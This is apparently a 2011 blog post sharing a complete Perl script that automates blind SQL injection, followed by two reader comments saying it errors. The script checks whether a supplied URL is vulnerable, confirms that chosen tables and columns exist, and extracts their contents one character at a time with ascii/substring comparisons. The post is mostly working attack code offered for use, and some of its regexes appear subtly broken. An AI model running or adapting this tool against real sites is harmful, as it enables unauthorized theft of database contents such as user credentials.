Blind Sql Injection
====================================
Hello all
How are you?
We know that some of us did not know Blind sql Injection
I worked a tool that works mechanical
From now you can do without browser
====================================PerL Code:#!/usr/bin/perl use LWP::Simple;
use Time::HiRes qw(gettimeofday); ###############################################################
$string='';
$limit=0;
#string variable###############################################
# if the string that you want to use is not writable #
# on the shell you can write in this variable and #
# whene the script order from you the variable just #
# press enter. #
###############################################################
#limit variable##############################################
# if you want a particular column just change this #
# variable. #
#############################################################
@ascii_sym = (32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,58,59,60,61,62,63,64,91,92,93,94,95,96,123,124,125,126); $glob_stat;
print "\n\t===============================================*\n";
print "\t* Blind Sql Injection Tool *\n";
print "\t* *\n";
print "\t* *\n";
print "\t* *\n";
print "\t===============================================*\n\n";
print "Stage 1:Checking if the target is vulnerable\n\n";
print "You should now enter the infected url\n";
print "Example :http://www.localhost/index.php?id=1\n\n";
print "URL: "; my $url = <STDIN>; chomp($url); $now = time_mili(); my $yes = get("$url+and+1=1"); $later = time_mili(); $exect = $later - $now; $exect = sprintf("%.2f", $exect); my $no = get("$url+and+1=0"); def($yes,$no);
print "Stage 2 :[*] Checking For A String That Can lead To exploit The Target[*]\n\n";
print " You should now enter a string(from shell or source code)\n";
print " and wait to see if is a good one. Your string must be \n";
print " related to the target\n\n";
print " The string must exist on the true page or the false page \n";
print " but not on both of them.\n";
print " A file has been created under the name string.txt it may help\n";
print " you to choose your string\n\n";
if($string eq ''){
print "String: "; $string = <STDIN>; chomp($string);
while(strc($yes,$no)!=1){
print "String: "; $string = <STDIN>; chomp($string);
}
}
else{
if(strc($yes,$no)!=1){
print "Please Choose another one\n: ";
exit;
}
} chomp($string);
print "\n => Nice choice\n\n";
print "Stage 3 :[*] Extracting Information From Database[*]\n\n";
print " You should now enter The Table name\n";
print " and number of Columns to be extracted\n";
print " and their names and condition on this columns\n";
print " if you want it\n\n";
print "Table Name : "; my $tbname = <STDIN>; chomp($tbname);
print "Columns Number : "; my $num = <STDIN>; chomp($num);
if($num =~ /^[+-]?d+$/){ chomp($num);
}
else{
while($num !~ /^[+-]?d+$/){
print "Columns Number : "; $num = <STDIN>; chomp($num);
}
} chomp($num); my @column,@trcolmun,@numtr,@result;
for(my $q=0;$q<$num;$q++){
print "Columns Name : "; $column[$q] = <STDIN>; chomp($column[$q]);
}
print "\n Do You have any condition on your information\n";
print " Exemple: where id=1\n\n";
print "(yes/no): "; my $condt = <STDIN>; chomp($condt);
if($condt eq 'yes'){
print "\nEnter Condition: "; $condition=<STDIN>; chomp($condition);
}
print "\nStage 3-1 :[*] Checking table and columns[*]\n\n";
print " Nothing That You Can do it now\n";
print " just let the script do his job\n\n"; my $pr=chvar("$url+and+(SELECT 1 from $tbname limit 0,1)=1");
if($pr==1){
print " => Table Existe\n";
}
else{
print " => Table Dosn't Existe";
exit;
} my $j=0;
for(my $q=0;$q<$num;$q++){ $pr = chvar("$url+and+(SELECT substring(concat(1,$column[$q]),1,1) from $tbname limit 0,1)=1");
if($pr==1){ $trcolumn[$j] = $column[$q];
print " => Column $column[$q] Existe\n"; $j++;
}
else{
print " => Column $column[$q] Dosn't Existe\n";
}
} $trco = @trcolumn;
if($trco==0){
print "\n => No Columns Found\n";
exit;
}
print "\nStage 3-2 :[*] Extracting Columns length[*]\n\n";
print " The Script is going now to get each\n";
print " columns length\n";
print "\nCounting length of Columns...\n\n";
for(my $q=0;$q<$j;$q++){ my $qj=0; my $ii=1;
while($qj==0){ $pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
if($pr==1){ $ii++; $pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
if($pr==1){ $qj=1;
}
else{ $ii--
}
} $ii++;
} $ii -=3; $numtr[$q]=$ii;
print " => $trcolumn[$q] : $ii\n";
}
for(my $rul=0;$rul<$trco;$rul++){ $result[$rul]='';
} $gtf=0;
($second, $minute, $hour) = localtime();
print "\nExtracting information ...\n\n";
print "Guessing time for each column(in seconds)\n\n";
for(my $idn=0;$idn<$trco;$idn++){ $max = $numtr[$idn] * $exect * 8; $max=sprintf("%.2f", $max); $gtf+=$max;
print " #=> $trcolumn[$idn] max time of extraction = $max\n";
}
print "\nStart at $hour:$minute:$second (expected time to finish (in seconds) : $gtf)\n\n"; $now1 = time_mili();
for(my $bn=0;$bn<$trco;$bn++){ $nowt = time_mili();
for(my $bnum=1;$bnum<=$numtr[$bn];$bnum++){ my $ascii=opt("$url+and+ascii(substring((select concat($trcolumn[$bn],0x3a)+from+$tbname $condition limit+$limit,1),$bnum,1))"); $result[$bn].=pack("c",$ascii);
} $latert = time_mili(); $realt = $latert - $nowt; $realt=sprintf("%.2f", $realt);
print " => $trcolumn[$bn] = [$result[$bn]] (real time = $realt)\n";
} $later1 = time_mili(); $exect1 = $later1 - $now1; $exect1 = sprintf("%.2f", $exect1);
($second, $minute, $hour) = localtime() ;
print "\nFinish at $hour:$minute:$second (elapsed time (in seconds) : $exect1) \n\n";
sub opt{ my $url=$_[0]; my $isnum = $url; my $sym_st; $isnum .= ">57"; my $isalpha = $url; $isalpha .= ">96"; my $isAlpha = $url; $isAlpha .= ">65"; my $rt=''; my $brp = chvar($isnum);
if($brp==1){ my $brp1 = chvar($isalpha);
if($brp1==1){ $rt = brute_alpha($url,97,103,110,115,122); $sym_st=3;
}
else{ $rt = brute_alpha($url,65,71,78,83,90); $sym_st=2;
}
}
else{ $rt = brute_num($url); $sym_st=1;
}
if(ord($rt) == 0){ $rt = opt_sym($url,$sym_st);
}
return $rt;
}
sub opt_sym(){ my $url = $_[0]; my $rt='';
if($_[1]==1){ my $ft = $url; $ft .= ">40"; my $rft = chvar($ft);
if($rft==1){ $rt = brute_sym($url,8,15);
}
else{ $rt = brute_sym($url,0,7);
}
}
else{
if($_[1]==2){ $rt=brute_sym($url,16,22);
}
else{ $rt=brute_sym($url,23,32);
}
}
return $rt;
}
sub reduse{
for(my $i=$_[0];$i<=$_[1];$i++){ my $tmp = $_[2]; $tmp .="=$i"; my $qq = chvar($tmp);
if($qq==1){
return $i; last;
}
}
}
sub brute_sym(){ my $ek;
for(my $i=$_[1];$i<=$_[2];$i++){ my $tmp = $_[0]; $tmp .="=$ascii_sym[$i]"; my $qq = chvar($tmp);
if($qq==1){ $ek=$i; last;
}
}
return $ascii_sym[$ek];
}
sub brute_num(){ my $url = $_[0]; my $ft = $url; my $rt=''; $ft .= ">52"; my $mrp = chvar($ft);
if($mrp==1){ $rt = reduse(53,57,$url);
}
else{ $rt = reduse(48,52,$url);
}
return $rt;
}
sub brute_alpha(){ my $url = $_[0]; my $ft = $url; my $sd = $url; my $td = $url; my $rt =''; $ft .= ">$_[2]"; $sd .= ">$_[3]"; $td .= ">$_[4]"; my $mrp = chvar($ft);
if($mrp==1){ my $mrp1 = chvar($sd);
if($mrp1==1){ my $mrp2=chvar($td);
if($mrp2==1){ $rt = reduse(($_[4]+1),$_[5],$url);
}
else{ $rt = reduse(($_[3]+1),$_[4],$url);
}
}
else{ $rt = reduse(($_[2]+1),$_[3],$url);
}
}
else{ $rt = reduse($_[1],$_[2],$url);
}
return $rt;
}
sub strc{ my $tmp=0;
if(($_[0] =~ /$string/) && ($_[1] !~ /$string/)){ $glob_stat=1;
return 1;
} elsif(($_[1] =~ /$string/) && ($_[0] !~ /$string/)){ $glob_stat=0;
return 1;
} elsif(($_[1] =~ /$string/) && ($_[0] =~ /$string/)){
return 0;
}
}
sub def{ my @fi = split(//,$_[0]); my @sd = split(//,$_[1]); my $rt=''; my $cn = @fi; my $cn1 = @sd; my $k;
($cn>$cn1) ? $k=$cn : $k=$cn1; my $i,$j=0;
for($i=0;$i<$k;$i++){
if($fi[$i] ne $sd[$i]){ $rt.=$fi[$i]; $j++;
}
}
if(($j>5) && ($j<($i-300))){
print "\n => Target Maybe Vulnerable\n\n"; open(MYFILE,'>string.txt');
print MYFILE $rt; close(MYFILE);
}
else{
print "\n => Target Not Vulnerable\n\n";
exit;
}
}
sub chvar{ my $url=$_[0]; my $tmp = get($url);
if($tmp=~/$string/){
if($glob_stat==1){
return 1;
} elsif($glob_stat==0){
return 0;
}
} elsif($tmp!~/$string/){
if($glob_stat==1){
return 0;
} elsif($glob_stat==0){
return 1;
}
}
}
sub time_mili(){ my $s,$m,$r;
($s,$m) = gettimeofday(); $r = "$s.$m"; $r +=0; my $rt = sprintf("%.3f", $r); $rt +=0;
return $rt;
}
©2011, copyright BLACK BURN
nao funciono mano erro linha 6 nao entendi o erro
ReplyDeleteerro
ReplyDelete